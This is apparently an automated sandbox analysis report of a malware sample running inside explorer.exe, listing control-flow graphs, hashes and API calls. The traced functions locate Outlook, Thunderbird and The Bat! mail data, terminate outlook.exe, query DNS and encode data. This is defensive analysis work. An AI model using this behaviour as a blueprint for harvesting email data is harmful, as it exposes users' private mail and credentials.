                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 895956442-0
                                                                                                                          • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                          • Instruction ID: 033e6cb75f2d339311f962f13fa8ac06e493cc9ff1ce6d36be3001a00a9229db
                                                                                                                          • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                          • Instruction Fuzzy Hash: 4B51383265891D4BCB24AA789C843E5B3D3F755332B1C062BC49AC3385E65AD846A38B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 87 fd3254-fd3287 call fd298c 90 fd328d-fd3297 call fd298c 87->90 91 fd343a-fd3456 87->91 90->91 94 fd329d-fd32aa call fd272c 90->94 97 fd32ac-fd32b3 94->97 98 fd32b5 94->98 99 fd32b7-fd32c2 call fd2688 97->99 98->99 102 fd342c-fd3435 call fd30a8 99->102 103 fd32c8-fd32fe call fd2688 call fd1838 * 2 call fd2938 99->103 102->91 113 fd340c-fd3427 call fd1860 * 4 103->113 114 fd3304-fd3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 115 fd331e-fd3326 114->115 115->113 117 fd332c-fd332f 115->117 117->113 119 fd3335-fd3348 117->119 124 fd334e-fd3377 GetPrivateProfileStringW 119->124 125 fd33f0-fd3406 119->125 124->125 127 fd3379-fd3398 GetPrivateProfileIntW 124->127 125->113 125->117 130 fd339a-fd33ad call fd2688 127->130 131 fd33e5-fd33eb call fd30a8 127->131 135 fd33af-fd33b3 130->135 136 fd33c6-fd33e3 call fd30a8 call fd1860 130->136 131->125 137 fd33bd-fd33c4 135->137 138 fd33b5-fd33ba 135->138 136->125 137->135 137->136 138->137
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00FD298C: GetFileAttributesW.KERNELBASE ref: 00FD299E
                                                                                                                          • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00FD330F
                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00FD336F
                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 00FD338C
                                                                                                                            • Part of subcall function 00FD30A8: FindFirstFileW.KERNELBASE ref: 00FD3104
                                                                                                                            • Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 970345848-0
                                                                                                                          • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                          • Instruction ID: 98762190f259faedb451a6cb0afdba458c809016136ea97be10b50aaa0c0cc32
                                                                                                                          • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                          • Instruction Fuzzy Hash: 3851C730B18F094BDB59FB2C9C1663972D3EB99310B48056FE50AC3396EE68DD41A387

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • StrStrIW.KERNELBASE ref: 00FD347E
                                                                                                                          • RegOpenKeyExW.KERNELBASE ref: 00FD353F
                                                                                                                          • RegEnumKeyExW.KERNELBASE ref: 00FD35D6
                                                                                                                            • Part of subcall function 00FD2774: RegOpenKeyExW.KERNELBASE ref: 00FD27C7
                                                                                                                            • Part of subcall function 00FD2774: RegQueryValueExW.KERNELBASE ref: 00FD27F4
                                                                                                                            • Part of subcall function 00FD2774: RegQueryValueExW.KERNELBASE ref: 00FD283A
                                                                                                                            • Part of subcall function 00FD2774: RegCloseKey.KERNELBASE ref: 00FD2860
                                                                                                                            • Part of subcall function 00FD3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00FD330F
                                                                                                                            • Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1841478724-0
                                                                                                                          • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                          • Instruction ID: f3e65cf3bdd5e5f06493a66389a7b6447c7609d048a8fec2a00f3f544d148dae
                                                                                                                          • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                          • Instruction Fuzzy Hash: 56416E30B18B494FDB94EF6D985972AB6E2FB98341F08056FA14EC3351DE38D9049782

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 232 fd2938-fd2943 233 fd2945-fd2948 232->233 234 fd2984 232->234 233->234 235 fd294a-fd2970 CreateFileW 233->235 236 fd2986-fd298b 234->236 237 fd2980-fd2982 235->237 238 fd2972-fd297a CloseHandle 235->238 237->236 238->237
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3498533004-0
                                                                                                                          • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                          • Instruction ID: dea0a8bf4adba25f4ec0e60c775ac0ab8331ae027b12bbb5781cad34d4718dff
                                                                                                                          • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                          • Instruction Fuzzy Hash: 9DF0E57061570A4FE7846FB844A8336F5D0FB18325F1C463EE45AC23D0D7348842A783

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 251 fd22b4-fd22c6 252 fd22c8-fd22d0 CreateStreamOnHGlobal 251->252 253 fd22d6-fd22e6 251->253 252->253
                                                                                                                          APIs
                                                                                                                          • CreateStreamOnHGlobal.COMBASE ref: 00FD22D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateGlobalStream
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2244384528-0
                                                                                                                          • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                          • Instruction ID: 5764f455a84df7927f9adbf4a76f3edcbd3895cbc1e77dd59cfc18be86ed9fcc
                                                                                                                          • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                          • Instruction Fuzzy Hash: 4FE08C30108B0A8FD798AFBCE4CA07A33A1EBAC252B09053FE005CB114D67988C18791

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 254 fd298c-fd2997 255 fd2999-fd299c 254->255 256 fd29b5 254->256 255->256 257 fd299e-fd29a7 GetFileAttributesW 255->257 258 fd29b7-fd29bc 256->258 259 fd29a9-fd29af 257->259 260 fd29b1-fd29b3 257->260 259->260 260->258
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE ref: 00FD299E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                          • Instruction ID: eca2f3f3aecf941ed9b9e45425d9b0fd5d93040edfe0e21cc2854bbc13ad5bcf
                                                                                                                          • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                          • Instruction Fuzzy Hash: EDD05B22A1190D076B9425F508E92792051D739335B1C0227E935C13A0D285C895B282

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 261 fd1860-fd1870 call fd1ad4 264 fd1886-fd188b 261->264 265 fd1872-fd1880 RtlFreeHeap 261->265 265->264
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                          • Instruction ID: 45b91d7e6c454f8d0c629c9f8d05ad7dcd7e7c2f6448e312f76a0737b00fac9a
                                                                                                                          • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                          • Instruction Fuzzy Hash: B2D01224B16A081BEF2CBBFA1C8D1747AD3F758222B1C8066B819C3352ED3DC895D341

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:14.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:96.2%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:212
                                                                                                                          Total number of Limit Nodes:2
                                                                                                                          execution_graph 679 3201000 680 3201010 679->680 681 3201007 679->681 683 3201016 681->683 691 32027e2 VirtualQuery 683->691 685 3201022 685->680 688 320102e RtlMoveMemory NtUnmapViewOfSection 694 320104f 688->694 692 320101e 691->692 692->685 693 32029b7 GetProcessHeap RtlAllocateHeap 692->693 693->688 733 32029b7 GetProcessHeap RtlAllocateHeap 694->733 696 320105c 734 32029b7 GetProcessHeap RtlAllocateHeap 696->734 698 320106b ExpandEnvironmentStringsW 699 3201085 698->699 700 320108c ExpandEnvironmentStringsW 698->700 735 320123a 699->735 702 32010a0 ExpandEnvironmentStringsW 700->702 703 3201099 700->703 705 32010b4 SHGetSpecialFolderPathW 702->705 706 32010ad 702->706 704 320123a 24 API calls 703->704 704->702 708 32010c5 705->708 709 32010cc ExpandEnvironmentStringsW 705->709 707 320123a 24 API calls 706->707 707->705 710 320123a 24 API calls 708->710 711 32010e0 ExpandEnvironmentStringsW 709->711 712 32010d9 709->712 710->709 713 32010f4 ExpandEnvironmentStringsW 711->713 714 32010ed 711->714 742 32011cc 712->742 717 3201101 713->717 718 3201108 ExpandEnvironmentStringsW 713->718 757 3201192 714->757 719 3201192 16 API calls 717->719 720 3201115 718->720 721 320111c ExpandEnvironmentStringsW 718->721 719->718 722 3201192 16 API calls 720->722 723 3201130 721->723 724 3201129 721->724 722->721 764 3202999 723->764 725 3201192 16 API calls 724->725 725->723 728 3201187 ExitProcess 730 320114e 731 320117f 730->731 732 3201158 wsprintfA 730->732 731->728 732->731 732->732 733->696 734->698 770 320274a CreateToolhelp32Snapshot 735->770 740 320255c 16 API calls 741 3201268 740->741 741->700 743 320255c 16 API calls 742->743 744 32011e6 743->744 745 320255c 16 API calls 744->745 746 32011f3 745->746 747 320255c 16 API calls 746->747 748 3201200 747->748 749 320255c 16 API calls 748->749 750 320120d 749->750 751 320255c 16 API calls 750->751 752 320121a 751->752 753 320255c 16 API calls 752->753 754 3201227 753->754 755 320255c 16 API calls 754->755 756 3201234 755->756 756->711 758 320255c 16 API calls 757->758 759 32011ac 758->759 760 320255c 16 API calls 759->760 761 32011b9 760->761 762 320255c 16 API calls 761->762 763 32011c6 762->763 763->713 765 32027e2 VirtualQuery 764->765 766 32029a1 765->766 767 3201137 766->767 768 32029a5 GetProcessHeap HeapFree 766->768 767->728 769 32029b7 GetProcessHeap RtlAllocateHeap 767->769 768->767 769->730 771 3202765 Process32First 770->771 772 3201249 770->772 773 32027ae 771->773 779 320255c 772->779 774 32027b2 CloseHandle 773->774 775 320277f lstrcmpiA 773->775 774->772 776 32027a0 Process32Next 775->776 777 3202795 775->777 776->773 794 32027be OpenProcess 777->794 797 32029b7 GetProcessHeap RtlAllocateHeap 779->797 781 320257a lstrcatW PathAppendW 782 32025a2 FindFirstFileW 781->782 783 320265d 781->783 782->783 787 32025b9 782->787 784 3202999 3 API calls 783->784 786 320125b 784->786 785 32025bd RtlZeroMemory 785->787 786->740 787->785 788 320263e FindNextFileW 787->788 789 320260f lstrcatW PathAppendW 787->789 792 32025df lstrcatW PathAppendW 787->792 793 320255c 5 API calls 787->793 788->785 791 3202652 FindClose 788->791 789->788 790 3202627 StrStrIW 789->790 790->787 790->788 791->783 792->787 792->788 793->787 795 32027e0 794->795 796 32027d0 TerminateProcess CloseHandle 794->796 795->776 796->795 797->781 827 3202013 828 3202036 827->828 829 3202029 lstrlen 827->829 838 32029b7 GetProcessHeap RtlAllocateHeap 828->838 829->828 831 320203e lstrcat 832 3202073 lstrcat 831->832 833 320207a 831->833 832->833 839 32020a7 833->839 836 3202999 3 API calls 837 320209d 836->837 838->831 873 3202415 839->873 843 32020d4 878 3202938 lstrlen MultiByteToWideChar 843->878 845 32020e3 879 32024cc RtlZeroMemory 845->879 848 32023f7 850 3202999 3 API calls 848->850 849 3202135 RtlZeroMemory 852 320216a 849->852 851 320208a 850->851 851->836 852->848 856 3202198 852->856 881 320243d 852->881 854 32023dd 854->848 855 3202999 3 API calls 854->855 855->848 856->854 890 32029b7 GetProcessHeap RtlAllocateHeap 856->890 858 3202268 wsprintfW 859 320228e 858->859 863 32022fb 859->863 891 32029b7 GetProcessHeap RtlAllocateHeap 859->891 861 32022c8 wsprintfW 861->863 862 32023ba 864 3202999 3 API calls 862->864 863->862 892 32029b7 GetProcessHeap RtlAllocateHeap 863->892 865 32023ce 864->865 865->854 867 3202999 3 API calls 865->867 867->854 868 32023b3 871 3202999 3 API calls 868->871 869 3202346 869->868 893 320296b VirtualAlloc 869->893 871->862 872 32023a0 RtlMoveMemory 872->868 874 32020c6 873->874 875 320241f 873->875 877 32029b7 GetProcessHeap RtlAllocateHeap 874->877 894 3202818 lstrlen lstrlen 875->894 877->843 878->845 880 32020f3 879->880 880->848 880->849 882 32024ab 881->882 884 320244a 881->884 882->856 883 320244e DnsQuery_W 883->884 884->882 884->883 885 320248d DnsFree inet_ntoa 884->885 885->884 886 32024ad 885->886 896 32029b7 GetProcessHeap RtlAllocateHeap 886->896 888 32024b7 897 3202938 lstrlen MultiByteToWideChar 888->897 890->858 891->861 892->869 893->872 895 3202839 894->895 895->874 896->888 897->882 798 3209d24 800 3209caf 798->800 799 3209f00 VirtualProtect VirtualProtect 801 3209ec9 799->801 800->799 800->801 899 3201e44 900 3201e5b lstrlen CharLowerBuffA 899->900 905 3201eb3 899->905 901 3201e75 900->901 906 3201e9d 900->906 902 3201e7f lstrcmpiA 901->902 901->906 902->901 902->905 903 32026a9 904 3202692 lstrlen RtlMoveMemory 904->903 905->903 905->904 906->905 907 3201ece 8 API calls 906->907 907->905 916 32018f4 CreateFileW 917 3201919 GetFileSize 916->917 918 320196d 916->918 919 3201965 CloseHandle 917->919 920 3201929 917->920 919->918 920->919 926 32029b7 GetProcessHeap RtlAllocateHeap 920->926 922 3201936 ReadFile 925 320194b 922->925 923 3202999 3 API calls 924 3201964 923->924 924->919 925->923 926->922 927 3209cf6 929 3209caf 927->929 928 3209f00 VirtualProtect VirtualProtect 930 3209ec9 928->930 929->927 929->928 929->930 898 3202917 lstrlenW WideCharToMultiByte 908 320295c VirtualFree 909 32026ac lstrlen 910 32026f3 909->910 911 32026c4 CryptBinaryToStringA 909->911 911->910 912 32026d7 911->912 915 32029b7 GetProcessHeap RtlAllocateHeap 912->915 914 32026e2 CryptBinaryToStringA 914->910 915->914 810 3201e3e 811 3201e5b lstrlen CharLowerBuffA 810->811 818 3201eb3 810->818 812 3201e75 811->812 813 3201e9d 811->813 812->813 814 3201e7f lstrcmpiA 812->814 813->818 819 3201ece StrStrIA 813->819 814->812 814->818 815 32026a9 816 3202692 lstrlen RtlMoveMemory 816->815 818->815 818->816 820 3201ef5 RtlMoveMemory RtlMoveMemory StrStrIA 819->820 821 3201eee 819->821 820->821 822 3201f37 StrStrIA 820->822 821->818 822->821 823 3201f4a StrStrIA 822->823 823->821 824 3201f5d lstrlen 823->824 824->821 825 3201f6a 824->825 825->821 826 3201f9b lstrlen 825->826 826->821 826->825 802 320118f 803 3201192 802->803 804 320255c 16 API calls 803->804 805 32011ac 804->805 806 320255c 16 API calls 805->806 807 32011b9 806->807 808 320255c 16 API calls 807->808 809 32011c6 808->809

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
                                                                                                                            • Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1
                                                                                                                          • lstrcatW.KERNEL32(00000000,?,032018F4), ref: 03202588
                                                                                                                          • PathAppendW.SHLWAPI(00000000,*.*,?,032018F4), ref: 03202594
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,?,032018F4), ref: 032025A8
                                                                                                                          • RtlZeroMemory.NTDLL(00000209,00000209), ref: 032025C3
                                                                                                                          • lstrcatW.KERNEL32(00000209,?,?,032018F4), ref: 032025E1
                                                                                                                          • PathAppendW.SHLWAPI(00000209,?,?,032018F4), ref: 032025ED
                                                                                                                          • lstrcatW.KERNEL32(00000209,?,?,032018F4), ref: 03202611
                                                                                                                          • PathAppendW.SHLWAPI(00000209,?,?,032018F4), ref: 0320261D
                                                                                                                          • StrStrIW.SHLWAPI(00000209,?,?,032018F4), ref: 0320262C
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,?,?,032018F4), ref: 03202644
                                                                                                                          • FindClose.KERNELBASE(00000000,?,032018F4), ref: 03202653
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 1648349226-438819550
                                                                                                                          • Opcode ID: b188307f86fd5911b8f55daf7338bfe1358a6736993a320cda90fd2301858727
                                                                                                                          • Instruction ID: 431f0ab3686e39ce1ac8731749ccb7f7bb8d5a7095a61d2186fb8d41dcc54aa9
                                                                                                                          • Opcode Fuzzy Hash: b188307f86fd5911b8f55daf7338bfe1358a6736993a320cda90fd2301858727
                                                                                                                          • Instruction Fuzzy Hash: 4421C379215306DFD710EF20EA8C96FBBADEF85704F04481EFA9192183DB35854E8666

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 032027E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,03202664,?,032018F4), ref: 032027EF
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0320103A
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03201043
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1675517319-0
                                                                                                                          • Opcode ID: c230712b75c473da43c90028dde7e42b5c0ef1f7235009ebd5e1092039ae2e71
                                                                                                                          • Instruction ID: a25d0f74ea3281b04809d9f64db59bce51608fd58b40401ef3f725ff96c53e47
                                                                                                                          • Opcode Fuzzy Hash: c230712b75c473da43c90028dde7e42b5c0ef1f7235009ebd5e1092039ae2e71
                                                                                                                          • Instruction Fuzzy Hash: 51D02B39811310A7DF24F7747D0C5DA2A5D9F05230B248601AA948A0C3C87448CC4370

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
                                                                                                                            • Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 0320107F
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 03201093
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010A7
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0320104E,?,03201010), ref: 032010BB
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010D3
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010E7
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010FB
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 0320110F
                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 03201123
                                                                                                                          • wsprintfA.USER32 ref: 0320116B
                                                                                                                          • ExitProcess.KERNEL32 ref: 03201189
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                          • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                          • API String ID: 1709485025-1688604020
                                                                                                                          • Opcode ID: b1d32baaa20b8654a5715bc026d85b6d8ea040157677768313eddd6287be5679
                                                                                                                          • Instruction ID: 8cc7f5143d54fad375ede67ecdf96dd9cc72f832f9d991a0f05decf1c761dbdb
                                                                                                                          • Opcode Fuzzy Hash: b1d32baaa20b8654a5715bc026d85b6d8ea040157677768313eddd6287be5679
                                                                                                                          • Instruction Fuzzy Hash: 0D31F75D36032A6AE715F3765C48F3F944D8F80F84B084014B945DA2C7DE94AC9D81F1

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03202758
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 03202777
                                                                                                                          • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0320278B
                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 032027A8
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 032027B3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                          • String ID: outlook.exe
                                                                                                                          • API String ID: 868014591-749849299
                                                                                                                          • Opcode ID: 978ee4e231549aca6e65a33ab46d44c5c3d02740b4fc3f96df8a91234aa65676
                                                                                                                          • Instruction ID: 4b8a3171994e3cd1c1a96147fda5ebf3d33a82e2fc35ec584c362b46808f570b
                                                                                                                          • Opcode Fuzzy Hash: 978ee4e231549aca6e65a33ab46d44c5c3d02740b4fc3f96df8a91234aa65676
                                                                                                                          • Instruction Fuzzy Hash: E0F0C234512228EBD720FA20AD4CBEE777DAB08324F004591EA88A21D6DB748A9C4A91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 82 3209cf6-3209d10 83 3209d15 82->83 84 3209d16-3209d28 83->84 86 3209d2a 84->86 87 3209d8e-3209d8f 84->87 89 3209d2c-3209d36 86->89 90 3209caf-3209cbd 86->90 88 3209d90-3209d95 87->88 93 3209d96-3209d98 88->93 89->83 94 3209d38-3209d43 89->94 91 3209cd1-3209cf4 90->91 92 3209cbf-3209cce 90->92 91->82 92->91 95 3209da1 93->95 96 3209d9a-3209d9f 93->96 97 3209d44-3209d4c 94->97 95->88 99 3209da3 95->99 96->95 97->97 98 3209d4e-3209d50 97->98 100 3209d52-3209d55 98->100 101 3209d79-3209d88 98->101 102 3209da8-3209daa 99->102 100->84 103 3209d57-3209d75 100->103 101->87 101->96 104 3209db3-3209db7 102->104 105 3209dac-3209db1 102->105 106 3209d7b-3209d88 103->106 107 3209f3d 103->107 104->102 108 3209db9 104->108 105->104 106->96 107->107 109 3209dc4-3209dc9 108->109 110 3209dbb-3209dc2 108->110 111 3209dd8-3209dda 109->111 112 3209dcb-3209dd4 109->112 110->102 110->109 115 3209de3-3209de7 111->115 116 3209ddc-3209de1 111->116 113 3209dd6 112->113 114 3209e4a-3209e4d 112->114 113->111 119 3209e52-3209e55 114->119 117 3209df0-3209df2 115->117 118 3209de9-3209dee 115->118 116->115 120 3209e14-3209e23 117->120 121 3209df4 117->121 118->117 122 3209e57-3209e59 119->122 125 3209e34-3209e41 120->125 126 3209e25-3209e2c 120->126 123 3209df5-3209df7 121->123 122->119 124 3209e5b-3209e5e 122->124 129 3209e00-3209e04 123->129 130 3209df9-3209dfe 123->130 124->119 131 3209e60-3209e7c 124->131 125->125 128 3209e43-3209e45 125->128 126->126 127 3209e2e 126->127 127->93 128->93 129->123 132 3209e06 129->132 130->129 131->122 133 3209e7e 131->133 134 3209e11 132->134 135 3209e08-3209e0f 132->135 136 3209e84-3209e88 133->136 134->120 135->123 135->134 137 3209e8a-3209ea0 136->137 138 3209ecf-3209ed2 136->138 144 3209ea1-3209ea6 137->144 139 3209ed5-3209edc 138->139 141 3209f00-3209f30 VirtualProtect * 2 139->141 142 3209ede-3209ee0 139->142 143 3209f34-3209f38 141->143 145 3209ee2-3209ef1 142->145 146 3209ef3-3209efe 142->146 143->143 147 3209f3a 143->147 144->136 148 3209ea8-3209eaa 144->148 145->139 146->145 147->107 149 3209eb3-3209ec0 148->149 150 3209eac-3209eb2 148->150 152 3209ec2-3209ec7 149->152 153 3209ec9-3209ecc 149->153 150->149 152->144
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003208000.00000040.80000000.00040000.00000000.sdmp, Offset: 03208000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3208000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd871161abbac29d783775026a1974c3ff0fd3080387ec1f78afb6c2fcff69e1
                                                                                                                          • Instruction ID: 6a4323c11ab6b860cd22eb92a0a514eed7afed7538bbfbb34b94f39fb85ad9f6
